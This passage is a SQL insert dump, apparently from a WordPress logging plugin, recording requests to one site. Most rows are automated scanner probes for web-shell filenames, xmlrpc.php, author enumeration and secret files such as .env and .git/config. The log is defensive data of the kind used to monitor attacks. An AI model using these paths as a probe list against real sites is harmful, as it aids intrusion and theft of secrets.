00:42:05'),(8796,'https://amb18b.com/moon.php','70.230.153.254','https://duckduckgo.com/',1,'2025-11-21 00:42:10','2025-11-21 00:42:10'),(8797,'https://amb18b.com/wp-admin/includes/','75.212.174.57','https://www.bing.com/',1,'2025-11-21 00:42:12','2025-11-21 00:42:12'),(8798,'https://amb18b.com/goods.php','65.164.201.187','https://www.google.com/',1,'2025-11-21 00:42:14','2025-11-21 00:42:14'),(8799,'https://amb18b.com/wp-good.php','32.117.225.106','https://www.google.co.uk/',1,'2025-11-21 00:42:27','2025-11-21 00:42:27'),(8800,'https://amb18b.com/xmrlpc.php','91.143.122.53','https://duckduckgo.com/',1,'2025-11-21 00:42:29','2025-11-21 00:42:29'),(8801,'https://amb18b.com/info.php','197.240.36.53','https://www.yahoo.com/',1,'2025-11-21 00:42:31','2025-11-21 00:42:31'),(8802,'https://amb18b.com/.__info.php','4.75.27.227','https://www.google.co.uk/',1,'2025-11-21 00:42:32','2025-11-21 00:42:32'),(8803,'https://amb18b.com/xmlrpc.php','84.71.235.200','https://www.google.com/',1,'2025-11-21 00:42:34','2025-11-21 00:42:34'),(8804,'https://amb18b.com/ALFA_DATA/admin.php','164.209.86.9','https://www.google.com/',1,'2025-11-21 00:42:36','2025-11-21 00:42:36'),(8805,'https://amb18b.com/aaa.php','113.75.45.158','https://www.google.de/',1,'2025-11-21 00:42:38','2025-11-21 00:42:38'),(8806,'https://amb18b.com/admin/admin.php','27.25.73.243','https://www.google.de/',1,'2025-11-21 00:42:40','2025-11-21 00:42:40'),(8807,'https://amb18b.com/akcc.php','30.222.184.243','https://www.google.de/',1,'2025-11-21 00:42:42','2025-11-21 00:42:42'),(8808,'https://amb18b.com/build.php','167.4.27.96','https://duckduckgo.com/',1,'2025-11-21 00:42:44','2025-11-21 00:42:44'),(8809,'https://amb18b.com/chosen.php','227.176.60.7','https://www.google.fr/',1,'2025-11-21 00:42:46','2025-11-21 00:42:46'),(8810,'https://amb18b.com/filemanager.php','222.243.218.243','https://www.yahoo.com/',1,'2025-11-21 00:42:48','2025-11-21 00:42:48'),(8811,'https://amb18b.com/flower.php','19.88.230.119','https://www.google.de/',1,'2025-11-21 00:42:51','2025-11-21 00:42:51'),(8812,'https://amb18b.com/function/function.php','105.45.237.101','https://www.google.de/',1,'2025-11-21 00:42:53','2025-11-21 00:42:53'),(8813,'https://amb18b.com/images/index.php','215.89.44.83','https://www.google.co.uk/',1,'2025-11-21 00:42:55','2025-11-21 00:42:55'),(8814,'https://amb18b.com/images/images/about.php','157.215.97.141','https://www.google.fr/',1,'2025-11-21 00:42:57','2025-11-21 00:42:57'),(8815,'https://amb18b.com/mari.php','53.234.97.82','https://www.bing.com/',1,'2025-11-21 00:42:59','2025-11-21 00:42:59'),(8816,'https://amb18b.com/nc4.php','99.147.30.214','https://duckduckgo.com/',1,'2025-11-21 00:43:01','2025-11-21 00:43:01'),(8817,'https://amb18b.com/wp-includes/style-engine/index.php','59.73.222.47','https://duckduckgo.com/',1,'2025-11-21 00:43:05','2025-11-21 00:43:05'),(8818,'https://amb18b.com/cgi-bin/','201.98.250.175','https://www.google.co.uk/',1,'2025-11-21 00:43:07','2025-11-21 00:43:07'),(8819,'https://amb18b.com/xleet.php','179.202.179.241','https://www.google.fr/',1,'2025-11-21 00:43:10','2025-11-21 00:43:10'),(8820,'https://amb18b.com/wp-admin/includes/','182.173.189.183','https://www.google.de/',1,'2025-11-21 00:43:12','2025-11-21 00:43:12'),(8821,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','124.7.75.131','https://duckduckgo.com/',1,'2025-11-21 00:43:15','2025-11-21 00:43:15'),(8822,'https://amb18b.com/wp-includes/style-engine/','73.20.180.125','https://www.google.com/',1,'2025-11-21 00:43:17','2025-11-21 00:43:17'),(8823,'https://amb18b.com/asasx.php','32.50.114.233','https://www.google.de/',1,'2025-11-21 00:43:19','2025-11-21 00:43:19'),(8824,'https://amb18b.com/file2.php','19.81.191.191','https://www.google.co.uk/',1,'2025-11-21 00:43:21','2025-11-21 00:43:21'),(8825,'https://amb18b.com/wp-includes/IXR/','50.36.207.253','https://www.yahoo.com/',1,'2025-11-21 00:43:27','2025-11-21 00:43:27'),(8826,'https://amb18b.com/wp-includes/block-supports/','22.241.11.18','https://www.google.de/',1,'2025-11-21 00:43:29','2025-11-21 00:43:29'),(8827,'https://amb18b.com/wp-includes/fonts/','10.211.73.51','https://www.bing.com/',1,'2025-11-21 00:43:30','2025-11-21 00:43:30'),(8828,'https://amb18b.com/wp-includes/fonts/index.php','190.146.248.248','https://www.google.fr/',1,'2025-11-21 00:43:33','2025-11-21 00:43:33'),(8829,'https://amb18b.com/wp-includes/js/crop/','226.102.106.56','https://www.google.fr/',1,'2025-11-21 00:43:35','2025-11-21 00:43:35'),(8830,'https://amb18b.com/wp-includes/rest-api/','208.92.234.203','https://www.bing.com/',1,'2025-11-21 00:43:37','2025-11-21 00:43:37'),(8831,'https://amb18b.com/wp-includes/widgets/','62.88.165.159','https://www.google.fr/',1,'2025-11-21 00:43:39','2025-11-21 00:43:39'),(8832,'https://amb18b.com/f5.php','235.187.215.217','https://duckduckgo.com/',1,'2025-11-21 00:43:41','2025-11-21 00:43:41'),(8833,'https://amb18b.com/god4m.php','188.152.62.131','https://www.bing.com/',1,'2025-11-21 00:43:42','2025-11-21 00:43:42'),(8834,'https://amb18b.com/uploads/','13.248.221.90','https://www.yahoo.com/',1,'2025-11-21 00:43:44','2025-11-21 00:43:44'),(8835,'https://amb18b.com/0.php','250.28.144.98','https://www.google.fr/',1,'2025-11-21 00:43:47','2025-11-21 00:43:47'),(8836,'https://amb18b.com/07.php','230.190.248.14','https://www.bing.com/',1,'2025-11-21 00:43:48','2025-11-21 00:43:48'),(8837,'https://amb18b.com/dropdown.php','43.220.25.224','https://duckduckgo.com/',1,'2025-11-21 00:43:50','2025-11-21 00:43:50'),(8838,'https://amb18b.com/makeasmtp.php','49.226.187.144','https://duckduckgo.com/',1,'2025-11-21 00:43:52','2025-11-21 00:43:52'),(8839,'https://amb18b.com/wp-sigunq.php','81.51.83.251','https://duckduckgo.com/',1,'2025-11-21 00:43:54','2025-11-21 00:43:54'),(8840,'https://amb18b.com/wso112233.php','24.210.250.143','https://www.google.fr/',1,'2025-11-21 00:43:56','2025-11-21 00:43:56'),(8841,'https://amb18b.com/alfanew.php','219.190.15.168','https://www.bing.com/',1,'2025-11-21 00:43:57','2025-11-21 00:43:57'),(8842,'https://amb18b.com/fw.php','210.55.185.197','https://www.bing.com/',1,'2025-11-21 00:44:00','2025-11-21 00:44:00'),(8843,'https://amb18b.com/install.php','155.212.212.173','https://www.google.co.uk/',1,'2025-11-21 00:44:02','2025-11-21 00:44:02'),(8844,'https://amb18b.com/simple.php','198.187.162.0','https://www.bing.com/',1,'2025-11-21 00:44:05','2025-11-21 00:44:05'),(8845,'https://amb18b.com/inputs.php','255.58.171.186','https://www.yahoo.com/',1,'2025-11-21 00:44:07','2025-11-21 00:44:07'),(8846,'https://amb18b.com/classsmtps.php','96.125.101.64','https://www.google.com/',1,'2025-11-21 00:44:09','2025-11-21 00:44:09'),(8847,'https://amb18b.com/wp-blog-header.php','245.196.203.246','https://www.yahoo.com/',1,'2025-11-21 00:44:11','2025-11-21 00:44:11'),(8848,'https://amb18b.com/wp-trackback.php','40.173.188.119','https://www.google.de/',1,'2025-11-21 00:44:12','2025-11-21 00:44:12'),(8849,'https://amb18b.com/wp-signup.php','185.219.36.40','https://www.google.com/',1,'2025-11-21 00:44:14','2025-11-21 00:44:14'),(8850,'https://amb18b.com/plugins.php','166.130.87.40','https://www.google.de/',1,'2025-11-21 00:44:20','2025-11-21 00:44:20'),(8851,'https://amb18b.com/post.php','246.151.124.60','https://duckduckgo.com/',1,'2025-11-21 00:44:24','2025-11-21 00:44:24'),(8852,'https://amb18b.com/xmlrpc.php','157.66.46.84','Direct Access',2,'2025-11-21 01:08:46','2025-11-21 01:08:25'),(8853,'https://amb18b.com/xmlrpc.php','159.69.71.83','Direct Access',2,'2025-11-21 01:25:10','2025-11-21 01:24:48'),(8854,'https://amb18b.com/xmlrpc.php','103.159.51.214','Direct Access',2,'2025-11-21 01:38:49','2025-11-21 01:38:46'),(8855,'https://amb18b.com/xmlrpc.php','178.253.43.167','Direct Access',2,'2025-11-21 02:08:33','2025-11-21 02:08:13'),(8856,'https://amb18b.com/xmlrpc.php','51.79.128.29','Direct Access',1,'2025-11-21 03:05:20','2025-11-21 03:05:20'),(8857,'https://amb18b.com/xmlrpc.php','157.230.219.118','Direct Access',1,'2025-11-21 03:09:25','2025-11-21 03:09:25'),(8858,'https://amb18b.com/xmlrpc.php','163.44.192.252','Direct Access',2,'2025-11-21 03:41:17','2025-11-21 03:41:01'),(8859,'https://amb18b.com/neshe.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:45','2025-11-21 03:56:45'),(8860,'https://amb18b.com/shell1.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:47','2025-11-21 03:56:47'),(8861,'https://amb18b.com/sec.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:50','2025-11-21 03:56:50'),(8862,'https://amb18b.com/filesss.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:52','2025-11-21 03:56:52'),(8863,'https://amb18b.com/ea.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:54','2025-11-21 03:56:54'),(8864,'https://amb18b.com/gi.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:56','2025-11-21 03:56:56'),(8865,'https://amb18b.com/10.php','52.169.148.186','Direct Access',1,'2025-11-21 03:56:58','2025-11-21 03:56:58'),(8866,'https://amb18b.com/11.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:00','2025-11-21 03:57:00'),(8867,'https://amb18b.com/12.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:02','2025-11-21 03:57:02'),(8868,'https://amb18b.com/13.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:04','2025-11-21 03:57:04'),(8869,'https://amb18b.com/hi.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:06','2025-11-21 03:57:06'),(8870,'https://amb18b.com/v.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:08','2025-11-21 03:57:08'),(8871,'https://amb18b.com/ar.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:10','2025-11-21 03:57:10'),(8872,'https://amb18b.com/article.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:12','2025-11-21 03:57:12'),(8873,'https://amb18b.com/install.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:14','2025-11-21 03:57:14'),(8874,'https://amb18b.com/1.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:15','2025-11-21 03:57:15'),(8875,'https://amb18b.com/bak.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:17','2025-11-21 03:57:17'),(8876,'https://amb18b.com/ini.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:19','2025-11-21 03:57:19'),(8877,'https://amb18b.com/mail.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:21','2025-11-21 03:57:21'),(8878,'https://amb18b.com/dlu.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:23','2025-11-21 03:57:23'),(8879,'https://amb18b.com/zde.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:25','2025-11-21 03:57:25'),(8880,'https://amb18b.com/ifm.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:27','2025-11-21 03:57:27'),(8881,'https://amb18b.com/redi.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:28','2025-11-21 03:57:28'),(8882,'https://amb18b.com/fns.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:30','2025-11-21 03:57:30'),(8883,'https://amb18b.com/pent.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:32','2025-11-21 03:57:32'),(8884,'https://amb18b.com/wsx.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:34','2025-11-21 03:57:34'),(8885,'https://amb18b.com/r79.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:35','2025-11-21 03:57:35'),(8886,'https://amb18b.com/mpxct.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:37','2025-11-21 03:57:37'),(8887,'https://amb18b.com/x3.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:39','2025-11-21 03:57:39'),(8888,'https://amb18b.com/wan.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:41','2025-11-21 03:57:41'),(8889,'https://amb18b.com/iov.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:42','2025-11-21 03:57:42'),(8890,'https://amb18b.com/ouh.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:44','2025-11-21 03:57:44'),(8891,'https://amb18b.com/asgtt.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:46','2025-11-21 03:57:46'),(8892,'https://amb18b.com/image.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:48','2025-11-21 03:57:48'),(8893,'https://amb18b.com/wok.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:50','2025-11-21 03:57:50'),(8894,'https://amb18b.com/alexus.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:53','2025-11-21 03:57:53'),(8895,'https://amb18b.com/sadis.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:55','2025-11-21 03:57:55'),(8896,'https://amb18b.com/admir.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:57','2025-11-21 03:57:57'),(8897,'https://amb18b.com/file52.php','52.169.148.186','Direct Access',1,'2025-11-21 03:57:59','2025-11-21 03:57:59'),(8898,'https://amb18b.com/133.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:01','2025-11-21 03:58:01'),(8899,'https://amb18b.com/x0.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:03','2025-11-21 03:58:03'),(8900,'https://amb18b.com/wsr2.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:06','2025-11-21 03:58:06'),(8901,'https://amb18b.com/wolv.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:09','2025-11-21 03:58:09'),(8902,'https://amb18b.com/av.php.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:11','2025-11-21 03:58:11'),(8903,'https://amb18b.com/pn.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:12','2025-11-21 03:58:12'),(8904,'https://amb18b.com/siln.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:14','2025-11-21 03:58:14'),(8905,'https://amb18b.com/s.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:16','2025-11-21 03:58:16'),(8906,'https://amb18b.com/fm.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:19','2025-11-21 03:58:19'),(8907,'https://amb18b.com/0x.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:21','2025-11-21 03:58:21'),(8908,'https://amb18b.com/ioxi-o.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:23','2025-11-21 03:58:23'),(8909,'https://amb18b.com/gm.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:25','2025-11-21 03:58:25'),(8910,'https://amb18b.com/alfa.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:27','2025-11-21 03:58:27'),(8911,'https://amb18b.com/up.php','52.169.148.186','Direct Access',2,'2025-11-21 03:58:43','2025-11-21 03:58:30'),(8912,'https://amb18b.com/admin.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:32','2025-11-21 03:58:32'),(8913,'https://amb18b.com/atomlib.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:34','2025-11-21 03:58:34'),(8914,'https://amb18b.com/info.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:36','2025-11-21 03:58:36'),(8915,'https://amb18b.com/about.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:38','2025-11-21 03:58:38'),(8916,'https://amb18b.com/d12.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:41','2025-11-21 03:58:41'),(8917,'https://amb18b.com/fileas.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:44','2025-11-21 03:58:44'),(8918,'https://amb18b.com/chosen.php?p=','52.169.148.186','Direct Access',1,'2025-11-21 03:58:46','2025-11-21 03:58:46'),(8919,'https://amb18b.com/we.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:48','2025-11-21 03:58:48'),(8920,'https://amb18b.com/bless11.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:51','2025-11-21 03:58:51'),(8921,'https://amb18b.com/error.php','52.169.148.186','Direct Access',1,'2025-11-21 03:58:53','2025-11-21 03:58:53'),(8922,'https://amb18b.com/xmlrpc.php','195.16.73.171','Direct Access',8,'2025-11-21 04:28:56','2025-11-21 04:28:34'),(8923,'https://amb18b.com/xmlrpc.php','5.175.47.32','Direct Access',8,'2025-11-21 04:38:04','2025-11-21 04:35:54'),(8924,'https://amb18b.com/xmlrpc.php','198.187.31.250','Direct Access',8,'2025-11-21 04:49:50','2025-11-21 04:49:30'),(8925,'https://amb18b.com/xmlrpc.php','35.225.238.220','Direct Access',1,'2025-11-21 04:50:47','2025-11-21 04:50:47'),(8926,'https://amb18b.com/xmlrpc.php','159.69.71.83','Direct Access',1,'2025-11-21 05:24:37','2025-11-21 05:24:37'),(8927,'https://amb18b.com/xmlrpc.php','85.95.216.149','Direct Access',1,'2025-11-21 05:38:51','2025-11-21 05:38:51'),(8928,'https://amb18b.com/xmlrpc.php','43.224.124.253','Direct Access',2,'2025-11-21 06:42:39','2025-11-21 06:08:33'),(8929,'https://amb18b.com/xmlrpc.php','103.38.161.197','Direct Access',1,'2025-11-21 06:17:04','2025-11-21 06:17:04'),(8930,'https://amb18b.com/xmlrpc.php','192.185.83.253','Direct Access',1,'2025-11-21 06:55:28','2025-11-21 06:55:28'),(8931,'https://amb18b.com/xmlrpc.php','37.24.161.119','Direct Access',1,'2025-11-21 07:05:15','2025-11-21 07:05:15'),(8932,'https://amb18b.com/xmlrpc.php','3.128.157.183','Direct Access',1,'2025-11-21 07:10:20','2025-11-21 07:10:20'),(8933,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.182.82.169','Direct Access',1,'2025-11-21 07:22:32','2025-11-21 07:22:32'),(8934,'https://amb18b.com//xmlrpc.php?rsd','34.182.82.169','Direct Access',1,'2025-11-21 07:22:33','2025-11-21 07:22:33'),(8935,'https://amb18b.com//?author=2','34.182.82.169','Direct Access',1,'2025-11-21 07:22:35','2025-11-21 07:22:35'),(8936,'https://amb18b.com//?author=3','34.182.82.169','Direct Access',1,'2025-11-21 07:22:35','2025-11-21 07:22:35'),(8937,'https://amb18b.com//xmlrpc.php','34.182.82.169','Direct Access',1,'2025-11-21 07:22:36','2025-11-21 07:22:36'),(8938,'https://amb18b.com/xmlrpc.php','157.230.219.118','Direct Access',1,'2025-11-21 07:27:21','2025-11-21 07:27:21'),(8939,'https://amb18b.com/xmlrpc.php','35.194.45.168','Direct Access',1,'2025-11-21 07:59:03','2025-11-21 07:59:03'),(8940,'https://amb18b.com/xmlrpc.php','2a00:1169:11c:99e0::','Direct Access',1,'2025-11-21 08:39:42','2025-11-21 08:39:42'),(8941,'https://amb18b.com/xmlrpc.php','137.184.0.143','Direct Access',2,'2025-11-21 09:07:31','2025-11-21 09:07:07'),(8942,'https://amb18b.com/xmlrpc.php','78.157.49.100','Direct Access',2,'2025-11-21 09:18:49','2025-11-21 09:18:23'),(8943,'https://amb18b.com/xmlrpc.php','2604:a880:400:d0::2424:7001','Direct Access',1,'2025-11-21 09:24:37','2025-11-21 09:24:37'),(8944,'https://amb18b.com/xmlrpc.php','184.168.126.97','Direct Access',1,'2025-11-21 10:18:20','2025-11-21 10:18:20'),(8945,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-11-21 10:34:37','2025-11-21 10:34:37'),(8946,'https://amb18b.com/xmlrpc.php','2a02:c207:2247:9793::1','Direct Access',1,'2025-11-21 11:28:36','2025-11-21 11:28:36'),(8947,'https://amb18b.com/admin','104.236.107.97','Direct Access',1,'2025-11-21 12:15:03','2025-11-21 12:15:03'),(8948,'https://amb18b.com/xmlrpc.php','2603:3:610f:6180::','Direct Access',1,'2025-11-21 12:47:28','2025-11-21 12:47:28'),(8949,'https://amb18b.com/uploaded_script.php','172.174.112.224','Invalid Referrer',1,'2025-11-21 13:23:35','2025-11-21 13:23:35'),(8950,'https://amb18b.com/uploaded_script.php','172.174.112.224','Invalid Referrer',1,'2025-11-21 13:23:42','2025-11-21 13:23:42'),(8951,'https://amb18b.com/graphql','209.97.180.8','Direct Access',1,'2025-11-21 13:33:32','2025-11-21 13:33:32'),(8952,'https://amb18b.com/api','209.97.180.8','Direct Access',1,'2025-11-21 13:33:33','2025-11-21 13:33:33'),(8953,'https://amb18b.com/api/graphql','209.97.180.8','Direct Access',1,'2025-11-21 13:33:34','2025-11-21 13:33:34'),(8954,'https://amb18b.com/graphql/api','209.97.180.8','Direct Access',1,'2025-11-21 13:33:35','2025-11-21 13:33:35'),(8955,'https://amb18b.com/api/gql','209.97.180.8','Direct Access',1,'2025-11-21 13:33:36','2025-11-21 13:33:36'),(8956,'https://amb18b.com/swagger-ui.html','209.97.180.8','Direct Access',1,'2025-11-21 13:33:37','2025-11-21 13:33:37'),(8957,'https://amb18b.com/swagger/index.html','209.97.180.8','Direct Access',1,'2025-11-21 13:33:38','2025-11-21 13:33:38'),(8958,'https://amb18b.com/swagger/swagger-ui.html','209.97.180.8','Direct Access',1,'2025-11-21 13:33:39','2025-11-21 13:33:39'),(8959,'https://amb18b.com/webjars/swagger-ui/index.html','209.97.180.8','Direct Access',1,'2025-11-21 13:33:39','2025-11-21 13:33:39'),(8960,'https://amb18b.com/swagger.json','209.97.180.8','Direct Access',1,'2025-11-21 13:33:40','2025-11-21 13:33:40'),(8961,'https://amb18b.com/swagger/v1/swagger.json','209.97.180.8','Direct Access',1,'2025-11-21 13:33:41','2025-11-21 13:33:41'),(8962,'https://amb18b.com/v2/api-docs','209.97.180.8','Direct Access',1,'2025-11-21 13:33:42','2025-11-21 13:33:42'),(8963,'https://amb18b.com/v3/api-docs','209.97.180.8','Direct Access',1,'2025-11-21 13:33:43','2025-11-21 13:33:43'),(8964,'https://amb18b.com/api-docs/swagger.json','209.97.180.8','Direct Access',1,'2025-11-21 13:33:44','2025-11-21 13:33:44'),(8965,'https://amb18b.com/api/swagger.json','209.97.180.8','Direct Access',1,'2025-11-21 13:33:45','2025-11-21 13:33:45'),(8966,'https://amb18b.com/@vite/env','209.97.180.8','Direct Access',1,'2025-11-21 13:33:46','2025-11-21 13:33:46'),(8967,'https://amb18b.com/actuator/env','209.97.180.8','Direct Access',1,'2025-11-21 13:33:47','2025-11-21 13:33:47'),(8968,'https://amb18b.com/server','209.97.180.8','Direct Access',1,'2025-11-21 13:33:48','2025-11-21 13:33:48'),(8969,'https://amb18b.com/.vscode/sftp.json','209.97.180.8','Direct Access',1,'2025-11-21 13:33:48','2025-11-21 13:33:48'),(8970,'https://amb18b.com/about','209.97.180.8','Direct Access',1,'2025-11-21 13:33:49','2025-11-21 13:33:49'),(8971,'https://amb18b.com/debug/default/view?panel=config','209.97.180.8','Direct Access',1,'2025-11-21 13:33:51','2025-11-21 13:33:51'),(8972,'https://amb18b.com/v2/_catalog','209.97.180.8','Direct Access',1,'2025-11-21 13:33:52','2025-11-21 13:33:52'),(8973,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','209.97.180.8','Direct Access',1,'2025-11-21 13:33:52','2025-11-21 13:33:52'),(8974,'https://amb18b.com/server-status','209.97.180.8','Direct Access',1,'2025-11-21 13:33:54','2025-11-21 13:33:54'),(8975,'https://amb18b.com/login.action','209.97.180.8','Direct Access',1,'2025-11-21 13:33:54','2025-11-21 13:33:54'),(8976,'https://amb18b.com/_all_dbs','209.97.180.8','Direct Access',1,'2025-11-21 13:33:55','2025-11-21 13:33:55'),(8977,'https://amb18b.com/.DS_Store','209.97.180.8','Direct Access',1,'2025-11-21 13:33:56','2025-11-21 13:33:56'),(8978,'https://amb18b.com/.env','209.97.180.8','Direct Access',1,'2025-11-21 13:33:57','2025-11-21 13:33:57'),(8979,'https://amb18b.com/.git/config','209.97.180.8','Direct Access',1,'2025-11-21 13:33:58','2025-11-21 13:33:58'),(8980,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','209.97.180.8','Direct Access',1,'2025-11-21 13:33:59','2025-11-21 13:33:59'),(8981,'https://amb18b.com/config.json','209.97.180.8','Direct Access',1,'2025-11-21 13:34:00','2025-11-21 13:34:00'),(8982,'https://amb18b.com/telescope/requests','209.97.180.8','Direct Access',1,'2025-11-21 13:34:01','2025-11-21 13:34:01'),(8983,'https://amb18b.com/info.php','209.97.180.8','Direct Access',1,'2025-11-21 13:34:02','2025-11-21 13:34:02'),(8984,'https://amb18b.com/sftp-config.json','103.77.107.57','Direct Access',1,'2025-11-21 14:00:10','2025-11-21 14:00:10'),(8985,'https://amb18b.com/.vscode/sftp.json','103.77.107.57','Direct Access',1,'2025-11-21 14:00:12','2025-11-21 14:00:12'),(8986,'https://amb18b.com/xmlrpc.php','162.0.208.67','Direct Access',1,'2025-11-21 14:09:09','2025-11-21 14:09:09'),(8987,'https://amb18b.com/xmlrpc.php','162.241.224.236','Direct Access',1,'2025-11-21 14:59:11','2025-11-21 14:59:11'),(8988,'https://amb18b.com/xmlrpc.php','27.74.251.194','Direct Access',1,'2025-11-21 16:32:32','2025-11-21 16:32:32'),(8989,'https://amb18b.com/xmlrpc.php','2603:3:6105:e00::','Direct Access',1,'2025-11-21 17:16:52','2025-11-21 17:16:52'),(8990,'https://amb18b.com/wp-includes/postnews.php','158.94.210.13','Invalid Referrer',1,'2025-11-21 17:42:03','2025-11-21 17:42:03'),(8991,'https://amb18b.com/wp-includes/postnews.php','158.94.210.13','Invalid Referrer',1,'2025-11-21 17:42:05','2025-11-21 17:42:05'),(8992,'https://amb18b.com/wp-admin/postnews.php','158.94.210.13','Invalid Referrer',2,'2025-11-21 17:42:11','2025-11-21 17:42:09'),(8993,'https://amb18b.com/xmlrpc.php','143.110.158.30','Direct Access',1,'2025-11-21 17:59:04','2025-11-21 17:59:04'),(8994,'https://amb18b.com/xmlrpc.php','2600:1f18:f65:400:dd3c:a259:e9eb:efdc','Direct Access',1,'2025-11-21 18:47:31','2025-11-21 18:47:31'),(8995,'https://amb18b.com/xmlrpc.php','103.42.117.165','Direct Access',1,'2025-11-21 19:25:19','2025-11-21 19:25:19'),(8996,'https://amb18b.com/wp-includes/rest-api/alfa-rex.php7','20.37.101.92','Direct Access',1,'2025-11-21 19:28:05','2025-11-21 19:28:05'),(8997,'https://amb18b.com/wp-admin/css/about.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:06','2025-11-21 19:28:06'),(8998,'https://amb18b.com/wp-admin/css/colors/coffee/about.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:07','2025-11-21 19:28:07'),(8999,'https://amb18b.com/wp-includes/SimplePie/network.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:09','2025-11-21 19:28:09'),(9000,'https://amb18b.com/wp-includes/theme-compat/chosen.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:10','2025-11-21 19:28:10'),(9001,'https://amb18b.com/widgets.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:11','2025-11-21 19:28:11'),(9002,'https://amb18b.com/b.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:13','2025-11-21 19:28:13'),(9003,'https://amb18b.com/adds.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:14','2025-11-21 19:28:14'),(9004,'https://amb18b.com/wp-includes/PHPMailer/admin.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:15','2025-11-21 19:28:15'),(9005,'https://amb18b.com/admin.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:16','2025-11-21 19:28:16'),(9006,'https://amb18b.com/autoload_classmap.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:18','2025-11-21 19:28:18'),(9007,'https://amb18b.com/default.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:21','2025-11-21 19:28:21'),(9008,'https://amb18b.com/db.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:23','2025-11-21 19:28:23'),(9009,'https://amb18b.com/gecko.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:24','2025-11-21 19:28:24'),(9010,'https://amb18b.com/abe.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:25','2025-11-21 19:28:25'),(9011,'https://amb18b.com/bs1.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:26','2025-11-21 19:28:26'),(9012,'https://amb18b.com/content.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:27','2025-11-21 19:28:27'),(9013,'https://amb18b.com/cc.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:28','2025-11-21 19:28:28'),(9014,'https://amb18b.com/css.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:29','2025-11-21 19:28:29'),(9015,'https://amb18b.com/cloud.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:30','2025-11-21 19:28:30'),(9016,'https://amb18b.com/bless.php','20.37.101.92','Direct Access',2,'2025-11-21 19:29:43','2025-11-21 19:28:32'),(9017,'https://amb18b.com/radio.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:33','2025-11-21 19:28:33'),(9018,'https://amb18b.com/cong.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:34','2025-11-21 19:28:34'),(9019,'https://amb18b.com/bak.php','20.37.101.92','Direct Access',1,'2025-11-21 